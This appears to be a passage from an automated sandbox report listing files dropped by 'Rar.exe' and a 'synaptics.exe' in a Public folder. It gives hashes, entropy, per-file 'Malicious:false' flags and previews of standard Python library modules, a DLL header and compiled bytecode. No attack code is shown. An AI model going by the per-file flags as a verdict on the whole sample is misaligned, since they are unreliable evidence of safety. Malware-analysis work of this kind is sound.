                                                                                                                                                                                                                                  SHA-512:C211EA590E51B36193F79E38389574DCFE8A71498F8156492D61B02B7AC6A559DF6D0BB1E21F3272D4D8F28E3376DB650C1A3CA0B221D0D7E7B3A36D8281A220
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import os..import ntsecuritycon.import pythoncom.import win32api.import win32com.server.policy.import win32con.import win32security.from ntsecuritycon import (. CONTAINER_INHERIT_ACE,. FILE_ALL_ACCESS,. FILE_APPEND_DATA,. FILE_GENERIC_EXECUTE,. FILE_GENERIC_READ,. FILE_GENERIC_WRITE,. FILE_READ_ATTRIBUTES,. FILE_READ_DATA,. FILE_READ_EA,. FILE_WRITE_ATTRIBUTES,. FILE_WRITE_DATA,. FILE_WRITE_EA,. INHERIT_ONLY_ACE,. OBJECT_INHERIT_ACE,. PSPCB_SI_INITDIALOG,. READ_CONTROL,. SI_ACCESS_CONTAINER,. SI_ACCESS_GENERAL,. SI_ACCESS_PROPERTY,. SI_ACCESS_SPECIFIC,. SI_ADVANCED,. SI_CONTAINER,. SI_EDIT_ALL,. SI_EDIT_AUDITS,. SI_EDIT_PROPERTIES,. SI_PAGE_ADVPERM,. SI_PAGE_AUDIT,. SI_PAGE_OWNER,. SI_PAGE_PERM,. SI_PAGE_TITLE,. SI_RESET,. STANDARD_RIGHTS_EXECUTE,. STANDARD_RIGHTS_READ,. STANDARD_RIGHTS_WRITE,. SYNCHRONIZE,. WRITE_DAC,. WRITE_OWNER,.).from pythoncom import IID_NULL.from win32c
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8637
                                                                                                                                                                                                                                  Entropy (8bit):4.801238101018742
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:99axrFfCnB+J7VsLOEBwzaYu/uSTPCuvWYjoAAxCecgmevTTtCh07xkjqcXozGyy:98xrpCIXsLoL+FueodxttCa7xPGyZ8
                                                                                                                                                                                                                                  MD5:B22937070DEB1173DDB1081DA8782C25
                                                                                                                                                                                                                                  SHA1:95F9E1DFF1755DBA17965F4EDBFD7E133D56328B
                                                                                                                                                                                                                                  SHA-256:F151377797F41881857809F33BD864D3480EC03DDDA0F54C94425415AA4040A0
                                                                                                                                                                                                                                  SHA-512:AF1890C9BE08B667E42532087E998E01CD0C5375BAB517B58A6E813AE467C0431FF634865852EE4D6B6085372389E47DBC7E2B38C33E2503F7FEEBDE400C0E72
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""".Implements a permissions editor for services..Service can be specified as plain name for local machine,.or as a remote service of the form \\machinename\service."""..import os..import ntsecuritycon.import pythoncom.import win32api.import win32com.server.policy.import win32con.import win32security.import win32service.from win32com.authorization import authorization..SERVICE_GENERIC_EXECUTE = (. win32service.SERVICE_START. | win32service.SERVICE_STOP. | win32service.SERVICE_PAUSE_CONTINUE. | win32service.SERVICE_USER_DEFINED_CONTROL.).SERVICE_GENERIC_READ = (. win32service.SERVICE_QUERY_CONFIG. | win32service.SERVICE_QUERY_STATUS. | win32service.SERVICE_INTERROGATE. | win32service.SERVICE_ENUMERATE_DEPENDENTS.).SERVICE_GENERIC_WRITE = win32service.SERVICE_CHANGE_CONFIG..from ntsecuritycon import (. CONTAINER_INHERIT_ACE,. INHERIT_ONLY_ACE,. OBJECT_INHERIT_ACE,. PSPCB_SI_INITDIALOG,. READ_CONTROL,. SI_ACCESS_CONTAINER,. SI_ACCESS_GENERAL,.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):113152
                                                                                                                                                                                                                                  Entropy (8bit):6.36538924307893
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:/YfNFv5OeD6rjd62YB6prYBtx2iqZZy6VlYiNKGNNO3Xp3iBOr:/cAhYEYBtx2iA5NKGNNO3XpSB0
                                                                                                                                                                                                                                  MD5:4F83EE894025F453185756FBC47EA9C3
                                                                                                                                                                                                                                  SHA1:70A811479C7329196DCE6AC18267E14FD6EC4C36
                                                                                                                                                                                                                                  SHA-256:C39113E3C7D308338B0BA5B218605A797890CE9C5515CAA87E5244E586359CD4
                                                                                                                                                                                                                                  SHA-512:3AD233AF3742F9718C77CB1FDF5683BD9BD7DF8E7E316D59502D8F9F7DF3D24E70C9472DB861FB9BBB0C2589405795B30DBFA22B091A0757BE82502F5B0FEF29
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......yS).=2G.=2G.=2G.4J.;2G.oGF.?2G.oGB.,2G.oGC.72G.oGD.<2G.)YC.:2G..[F.?2G..GF.92G.)YF.:2G.=2F..2G..GN.,2G..GG.<2G..GE.<2G.Rich=2G.................PE..L...}..d...........!......................................................................@..........................|..T....|..........\........................)...R..T............................R..@............................................text...k........................... ..`.rdata..............................@..@.data.... ...........|..............@....rsrc...\...........................@..@.reloc...).......*..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):26605
                                                                                                                                                                                                                                  Entropy (8bit):4.4796819072543625
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:gk38juhVciXCBRFY0VbUu/5Y2RGwrHfxGN8vlyk8fkRC:g8hVciXuRF2UGwrHINglykPRC
                                                                                                                                                                                                                                  MD5:A17093EC72AAEA5AC4577A66AA08A854
                                                                                                                                                                                                                                  SHA1:426A82CFAD92FF74C773A402A04E5F2E62E7DFAA
                                                                                                                                                                                                                                  SHA-256:2358675675BEB7A085FB97A7470B7E96327DFA8DE25BA49C5E5B4153197A4086
                                                                                                                                                                                                                                  SHA-512:5B81E97E8EC85A59C1F95148030DD1754C8E6D80FE794D895A05F47CA63961E49FA7074DCA85EBE79FE813467676C58DC7D428FFF19DF8ECE321ACC9E9CE28DE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Tokenization help for Python programs.....tokenize(readline) is a generator that breaks a stream of bytes into..Python tokens. It decodes the bytes according to PEP-0263 for..determining source file encoding.....It accepts a readline-like method which is called repeatedly to get the..next line of input (or b"" for EOF). It generates 5-tuples with these..members:.... the token type (see token.py).. the token (a string).. the starting (row, column) indices of the token (a 2-tuple of ints).. the ending (row, column) indices of the token (a 2-tuple of ints).. the original line (string)....It is designed to match the working of the Python tokenizer exactly, except..that it produces COMMENT tokens for comments and gives type OP for all..operators. Additionally, all token lists start with an ENCODING token..which tells you which encoding was used to decode the bytes stream..."""....__author__ = 'Ka-Ping Yee <ping@lfw.org>'..__credits__ = ('GvR, ESR, Tim Peters, Thomas Wou
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):29943
                                                                                                                                                                                                                                  Entropy (8bit):4.347507846378227
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:s8ANL0a9ZzFP5mpE+y0161HRlT9Lx+Mdbud3:biL0aJYp5yVtfud3
                                                                                                                                                                                                                                  MD5:44BAC37B405DD10CBEFE06F87249CDEF
                                                                                                                                                                                                                                  SHA1:3F1F7575D8FEE518D2E1D898CE1B557FEFD89A84
                                                                                                                                                                                                                                  SHA-256:7D0148C232A2116E1F47346532B62CAAB39D26743299E734362551520828C713
                                                                                                                                                                                                                                  SHA-512:2DDAEA9CC43D90404031A2E395320F5830717BD8CC9064948AD5039EF09DE640CA49F0601821A6EAC8EE3E7DF8C9C93B32C30FFAB48B89A7BF9EBE1BA963BA7E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#!/usr/bin/env python3....# portions copyright 2001, Autonomous Zones Industries, Inc., all rights.....# err... reserved and offered to the public under the terms of the..# Python 2.2 license...# Author: Zooko O'Whielacronx..# http://zooko.com/..# mailto:zooko@zooko.com..#..# Copyright 2000, Mojam Media, Inc., all rights reserved...# Author: Skip Montanaro..#..# Copyright 1999, Bioreason, Inc., all rights reserved...# Author: Andrew Dalke..#..# Copyright 1995-1997, Automatrix, Inc., all rights reserved...# Author: Skip Montanaro..#..# Copyright 1991-1995, Stichting Mathematisch Centrum, all rights reserved...#..#..# Permission to use, copy, modify, and distribute this Python software and..# its associated documentation for any purpose without fee is hereby..# granted, provided that the above copyright notice appears in all copies,..# and that both that copyright notice and this permission notice appear in..# supporting documentation, and that the name of neither Automatrix,..# Bioreas
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):26910
                                                                                                                                                                                                                                  Entropy (8bit):4.415954176266664
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:yMn4PJRbCzdIxe/djOOkCnLIr4RCI+jpJAhqxSpGNYCkcAaZMGJP:yM4htOIxeb+f5PYX5aaGJP
                                                                                                                                                                                                                                  MD5:9FF63955DDAAD02512C46D4042FF21D5
                                                                                                                                                                                                                                  SHA1:9FD62E2D0BC3AB552157F6A844870D1C4D092A95
                                                                                                                                                                                                                                  SHA-256:3725667A85A861E1EE626774F9AE11F3EF7DAB2210222EB1742546F8057CA7B5
                                                                                                                                                                                                                                  SHA-512:79F56EE47A36CF81A4361927B17BA7F69507961ECF196419C0AFD06516F53C2891C30A469100233E410BEFC6244831FD21F6866BE9F61BF80BD402DBF100BE9D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Extract, format and print information about Python stack traces."""....import collections..import itertools..import linecache..import sys....__all__ = ['extract_stack', 'extract_tb', 'format_exception',.. 'format_exception_only', 'format_list', 'format_stack',.. 'format_tb', 'print_exc', 'format_exc', 'print_exception',.. 'print_last', 'print_stack', 'print_tb', 'clear_frames',.. 'FrameSummary', 'StackSummary', 'TracebackException',.. 'walk_stack', 'walk_tb']....#..# Formatting and printing lists of traceback lines...#....def print_list(extracted_list, file=None):.. """Print the list of tuples as returned by extract_tb() or.. extract_stack() as a formatted stack trace to the given file.""".. if file is None:.. file = sys.stderr.. for item in StackSummary.from_list(extracted_list).format():.. print(item, file=file, end="")....def format_list(extracted_list):.. """Format a list of tuples or FrameSummary obj
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):18607
                                                                                                                                                                                                                                  Entropy (8bit):4.3022125555964355
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:+4LhpNVbPdoUFsyIygyWy98JYYV/lGT7mEE/U/JZJtvryt/+ZYJOZGB5qTW:VhbVbPbFhFdWy98JYYVNGXLjGT
                                                                                                                                                                                                                                  MD5:0233BC515180C861D919BA79B6928163
                                                                                                                                                                                                                                  SHA1:FD671280B0ECDD6E8EB44F36C75ADE6E5C32DE8F
                                                                                                                                                                                                                                  SHA-256:488C28AD5FD084DD715986EA235928894F1B140AC880A5872655A99C97054DC2
                                                                                                                                                                                                                                  SHA-512:6B158318BF6BBCE099EC3519E5A2780504ADBB93B76F33FA19DE57BCA808757A466731D2D7C47EBCA29B492AE66685908449B811A02DA1BD62FE1F6D95B0A7A5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from collections.abc import Sequence, Iterable..from functools import total_ordering..import fnmatch..import linecache..import os.path..import pickle....# Import types and functions implemented in C..from _tracemalloc import *..from _tracemalloc import _get_object_traceback, _get_traces......def _format_size(size, sign):.. for unit in ('B', 'KiB', 'MiB', 'GiB', 'TiB'):.. if abs(size) < 100 and unit != 'B':.. # 3 digits (xx.x UNIT).. if sign:.. return "%+.1f %s" % (size, unit).. else:.. return "%.1f %s" % (size, unit).. if abs(size) < 10 * 1024 or unit == 'TiB':.. # 4 or 5 digits (xxxx UNIT).. if sign:.. return "%+.0f %s" % (size, unit).. else:.. return "%.0f %s" % (size, unit).. size /= 1024......class Statistic:.. """.. Statistic difference on memory allocations between two Snapshot instance... """.... __slots__ = ('traceback
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):915
                                                                                                                                                                                                                                  Entropy (8bit):5.155261600153728
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:NTExRunRoMsDJ3DTFBNUtzlZhFR7nrCVRTLSgDmOSad5hsh3G9FX9bI0ARdCVRTt:NT0SWBgTFRXC7TBLSavr/9UpC7TVlI9u
                                                                                                                                                                                                                                  MD5:766278735444B810C8C42470582F1A83
                                                                                                                                                                                                                                  SHA1:0137F3643374A75BC4F60CE34668BEA5C299C921
                                                                                                                                                                                                                                  SHA-256:45805F726BF977290DFAC21AEAC1E506E7759804BF9D01DB5DCF7D17337AEA30
                                                                                                                                                                                                                                  SHA-512:FD1EE04ED1AED4097E96A15A902398790447DB311577E8B8ECA86752D353A2699D6C9101C4D5DDF846DBFC3144B8B51CAC0016C1C84827AE7A0B30E9E88F7AC4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Terminal utilities."""....# Author: Steen Lumholt.....from termios import *....__all__ = ["setraw", "setcbreak"]....# Indexes for termios list...IFLAG = 0..OFLAG = 1..CFLAG = 2..LFLAG = 3..ISPEED = 4..OSPEED = 5..CC = 6....def setraw(fd, when=TCSAFLUSH):.. """Put terminal into a raw mode.""".. mode = tcgetattr(fd).. mode[IFLAG] = mode[IFLAG] & ~(BRKINT | ICRNL | INPCK | ISTRIP | IXON).. mode[OFLAG] = mode[OFLAG] & ~(OPOST).. mode[CFLAG] = mode[CFLAG] & ~(CSIZE | PARENB).. mode[CFLAG] = mode[CFLAG] | CS8.. mode[LFLAG] = mode[LFLAG] & ~(ECHO | ICANON | IEXTEN | ISIG).. mode[CC][VMIN] = 1.. mode[CC][VTIME] = 0.. tcsetattr(fd, when, mode)....def setcbreak(fd, when=TCSAFLUSH):.. """Put terminal into a cbreak mode.""".. mode = tcgetattr(fd).. mode[LFLAG] = mode[LFLAG] & ~(ECHO | ICANON).. mode[CC][VMIN] = 1.. mode[CC][VTIME] = 0.. tcsetattr(fd, when, mode)..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):147901
                                                                                                                                                                                                                                  Entropy (8bit):4.482922205570421
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:RhZ5qJ9LvUDb+m2lrOprf5Aibivx4fi1lSCOVXc7:gFsb92lrOprf5ax4fi1lNOVXc7
                                                                                                                                                                                                                                  MD5:87A161538841B0A199EE354BAAFE9EDA
                                                                                                                                                                                                                                  SHA1:D6F87E3743EB1A92F75F7DB91D5ED609F721E1A2
                                                                                                                                                                                                                                  SHA-256:9D4D85BD394123349A6F73326C9236D45E84F0920C2695FEB9B1CD18C6BF2681
                                                                                                                                                                                                                                  SHA-512:34D3314445EA94C30A19B8080C79034A7A434A0293317B44D9F128A45ADC107BCA8736121A72FFE7B04EDFE38BAEE876E6FB2D0375A095D48A79EF698939CB4F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# turtle.py: a Tkinter based turtle graphics module for Python..# Version 1.1b - 4. 5. 2009..#..# Copyright (C) 2006 - 2010 Gregor Lingl..# email: glingl@aon.at..#..# This software is provided 'as-is', without any express or implied..# warranty. In no event will the authors be held liable for any damages..# arising from the use of this software...#..# Permission is granted to anyone to use this software for any purpose,..# including commercial applications, and to alter it and redistribute it..# freely, subject to the following restrictions:..#..# 1. The origin of this software must not be misrepresented; you must not..# claim that you wrote the original software. If you use this software..# in a product, an acknowledgment in the product documentation would be..# appreciated but is not required...# 2. Altered source versions must be plainly marked as such, and must not be..# misrepresented as being the original software...# 3. This notice may not be removed or altered
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10424
                                                                                                                                                                                                                                  Entropy (8bit):4.624334482565398
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:RYevVry18c+zNVWPfeSE5b6r/OKi+VfTQJWDswfAE9UYzaSaVDYG1XVz6:RYu+189zHWPm9l4faWYwLaVDZ1XV+
                                                                                                                                                                                                                                  MD5:C58C7A4EE7E383BE91CD75264D67B13B
                                                                                                                                                                                                                                  SHA1:60914B6F1022249CD5D0CF8CAA7ADB4DCF34C9EA
                                                                                                                                                                                                                                  SHA-256:0D3A1A2F8F0E286AD9EADBB397AF0C2DC4BEF0C71A7EBE4B51DED9862A301B01
                                                                                                                                                                                                                                  SHA-512:9450E434C0D4ABB93FA4CA2049626C05F65D4FB796D17AC5E504B8EC086ABEC00DCDC54319C1097D20E6E1EEC82529993482E37A0BF9675328421F1FA073BF04
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""..Define names for built-in types that aren't directly accessible as a builtin..."""..import sys....# Iterators in Python aren't a matter of type but of protocol. A large..# and changing number of builtin types implement *some* flavor of..# iterator. Don't check the type! Use hasattr to check for both..# "__iter__" and "__next__" attributes instead.....def _f(): pass..FunctionType = type(_f)..LambdaType = type(lambda: None) # Same as FunctionType..CodeType = type(_f.__code__)..MappingProxyType = type(type.__dict__)..SimpleNamespace = type(sys.implementation)....def _cell_factory():.. a = 1.. def f():.. nonlocal a.. return f.__closure__[0]..CellType = type(_cell_factory())....def _g():.. yield 1..GeneratorType = type(_g())....async def _c(): pass.._c = _c()..CoroutineType = type(_c).._c.close() # Prevent ResourceWarning....async def _ag():.. yield.._ag = _ag()..AsyncGeneratorType = type(_ag)....class _C:.. def _m(self): pass..MethodType = type(_C(
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):95233
                                                                                                                                                                                                                                  Entropy (8bit):4.620896311323428
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:sChrnYjztAmhmKGKx/cHLfxRs/XbuRbSzN3LKn0EOdITayuk8wr6/XIN+N3:sChrnYtjmKa5KXbuRgN32n2d0aTwru4e
                                                                                                                                                                                                                                  MD5:82326ED4E7F4E1BEA3CF43DBBD7A1BC5
                                                                                                                                                                                                                                  SHA1:A87A102CD28E9CC4749DFCC320434866D7B23315
                                                                                                                                                                                                                                  SHA-256:6297F3CDEE258CF737E0167974DB2912F5933F59F8E7FD1EE33FD2F7A959351D
                                                                                                                                                                                                                                  SHA-512:C2A68B6F90321725442A69C75297E62C08F38BB9DA6A3EB1DC43CF0817633CED9CD70421FCD375A39D69FC0E4D8CE7E69D88835C8C75B8B0337CE8B30AA1713C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""..The typing module: Support for gradual typing as defined by PEP 484.....At large scale, the structure of the module is following:..* Imports and exports, all public names should be explicitly added to __all__...* Internal helper functions: these should never be used in code outside this module...* _SpecialForm and its instances (special forms):.. Any, NoReturn, ClassVar, Union, Optional, Concatenate..* Classes whose instances can be type arguments in addition to types:.. ForwardRef, TypeVar and ParamSpec..* The core of internal generics API: _Generiuseras and _VariadicGeneriuseras, the latter is.. currently only used by Tuple and Callable. All subscripted types like X[int], Union[int, str],.. etc., are instances of either of these classes...* The public counterpart of the generics API consists of two classes: Generic and Protocol...* Public helper functions: get_type_hints, overload, cast, no_type_check,.. no_type_check_decorator...* Generic aliases for collections.abc ABCs a
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):142
                                                                                                                                                                                                                                  Entropy (8bit):4.267416930885282
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:y/1LRylluleh/wZWedaHF5oXu5E5/ZqOkcTgp:y/7y/qeh/wJaHKJAu4
                                                                                                                                                                                                                                  MD5:25B73549A6DD1D083345FF6C574AC93B
                                                                                                                                                                                                                                  SHA1:DD921C11AC0B5B5268921C3C1BC621CC5C229908
                                                                                                                                                                                                                                  SHA-256:79DF944DA9CD395A864673CE780F5B1B5D66F5AC138EE0BDE2752CDD79657ED0
                                                                                                                                                                                                                                  SHA-512:65296DD0D876F941631373971E219CD38B2ECBAF85491D6B31252E86FDDCFDC3DECD7DC7BAEE59140CC5DC79C42C49A824A1614E942BA43887B1122B80C5ADA1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.S.).N..r....r....r.....1C:\Users\Public\M20EKMMEH2\lib\urllib\__init__.py..<module>....s......
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2864
                                                                                                                                                                                                                                  Entropy (8bit):4.910877834461308
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:zSbuQshuDSkJ8eJ/53iWqgpHO26ZenDxp/mdveDI8JG/UOUPkjKbMrHoYwqmAMla:GbuyDSkJ8eJ/dmgpHF/DxwdveDI84/Ue
                                                                                                                                                                                                                                  MD5:9B29DBA052567FF45CE43CFDA2C19634
                                                                                                                                                                                                                                  SHA1:B7477B583D338500792EF60C0C3B5052C54966D6
                                                                                                                                                                                                                                  SHA-256:593D71AB5379839E65DFF64858BCBF9834AF4B48DD80A70256E4204FCB1E26AC
                                                                                                                                                                                                                                  SHA-512:5A174E3ED93FF210E3E97F7207AADD055321C9A3AA7918C115A6506AE82EDA02A609EDF83B7D8FC0A4574CADA64A5F3503021D9ED392EE4FE19822FBDD31F558
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...sV...d.Z.d.d.l.Z.d.d.l.Z.g.d...Z.G.d.d...d.e...Z.G.d.d...d.e.e.j.j...Z.G.d.d...d.e...Z.d.S.).a....Exception classes raised by urllib...The base exception class is URLError, which inherits from OSError. It.doesn't define any behavior of its own, but is the base class for all.exceptions defined in this package...HTTPError is an exception class that is also a valid HTTP response.instance. It behaves this way because HTTP protocol errors are valid.responses, with a status code, headers, and a body. In some contexts,.an application may want to handle an exception like a regular.response.......N)...URLError..HTTPError..ContentTooShortErrorc....................@...s....e.Z.d.Z.d.d.d...Z.d.d...Z.d.S.).r....Nc....................C...s$...|.f.|._.|.|._.|.d.u.r.|.|._.d.S.d.S...N)...args..reason..filename)...selfr....r......r......C:\Users\Public\M20EKMMEH2\lib\urllib\error.py..__init__....s..............z.URLError.__init__c....................C...s....d
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):33787
                                                                                                                                                                                                                                  Entropy (8bit):5.443140417822498
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:IGxj6W55iCzXy6A9T7A7jJ7IreL5xo5Im4QfiOSMKAsrhZWB3qrwp01i3mr/Cd:IGxtqTU5cra/oLbKAkh8B3qrwapjCd
                                                                                                                                                                                                                                  MD5:BE1E9A2B3536C4FFE6654AEF09013C8A
                                                                                                                                                                                                                                  SHA1:F3C4E85AD9C6EB5A9210FC843A868E509009AA5D
                                                                                                                                                                                                                                  SHA-256:25286390147DFC80B6AE30C0F8D47E67D72130675E6E0B4DAB77404368C59837
                                                                                                                                                                                                                                  SHA-512:254AC54E7A3CA762BA17880AD735E07D30895E013B52020247A2E7B96F539B8C9831A1A251CF259D368C2BEEBECB370F5EC39FDC9D10ED9DC3CAD5753C7D496E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.g.d...Z.g.d...Z.g.d...Z.g.d...Z.g.d...Z.g.d...Z.d.Z.g.d...Z.d.Z.i.Z.d.d...Z.d.Z.d.Z.d.d...Z.e.e.f.d.d...Z.e.e.f.d.d...Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d ..d e.e...Z.G.d!d"..d"e.e...Z.d.d#l.m.Z...e.d$d%..Z.e.d&d'..Z e.d(d)..Z!d*e._.d+e.j"_.d,e.j#_.d-e _.d.e j$_.d/e j%_.d0e j&_.d1e j'_.d2e j#_.d3e!_.e j$j.e!j$_.e j%j.e!j%_.e j&j.e!j&_.d4e!j(_.e j'j.e!j'_.e j#j.e!j#_.e.Z)G.d5d$..d$e.e...Z*G.d6d&..d&e e...Z+G.d7d(..d(e!e...Z,G.d8d9..d9e.e...Z-G.d:d;..d;e e...Z.G.d<d=..d=e!e...Z/d>d?..Z0e0....[0d.dBdC..Z1dDdE..Z2d.dFdG..Z3dHdI..Z4d.dJdK..Z5dLdM..Z6dNdO..Z7d.dPdQ..Z8dRdS..Z9dTZ:d.a;dUdV..Z<e..=dW..Z>d.dZd[..Z?.\.]d.d^d_..Z@.\.]d.d`da..ZAd.dbdc..ZBeCdd..ZDeEeD..ZFi.ZGG.dedf..dfe.jH..ZId.dhdi..ZJd.djdk..ZKd.dldm..ZLd\d@d.d.eKf.dndo..ZMdpdq..ZNdrds..ZOdtdu..ZPdvdw..ZQd.aRdxdy..ZSdzd{..ZTd.aUd|d}..ZVd~d...ZWd.d...ZXd.d...ZYd.d...ZZd.d...Z[d.a\d.d...Z]d.d.d...Z^d.d.d...Z_
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):71349
                                                                                                                                                                                                                                  Entropy (8bit):5.431899423681214
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:6ZcvBKtoBL6sxVuJaP6IMydlT2rQuyHuQfaC6x4oinfTQcJ0:6WgtU6AI663Qu46ufMY0
                                                                                                                                                                                                                                  MD5:841215D963B9F4E5BE6F986BB49746D6
                                                                                                                                                                                                                                  SHA1:AFA3F74A012AFBE5BD126BDD9CF3BB7AF758372C
                                                                                                                                                                                                                                  SHA-256:E510CC16F0FA6EBFC837752A495A2CF7CEA7A16EF1A92D0617B2DD62710FBF97
                                                                                                                                                                                                                                  SHA-512:9E7DBEC2389E787A78B7B93CBFCCCA8B8602EB7D0B07B3DEFC0354695A00335F4777D74BB0FC2A9AB8001A44C5E988BA0CBB334BB1CBD5FF9BB9F5003FD6DF82
                                                                                                                                                                                                                                  Malicious:false
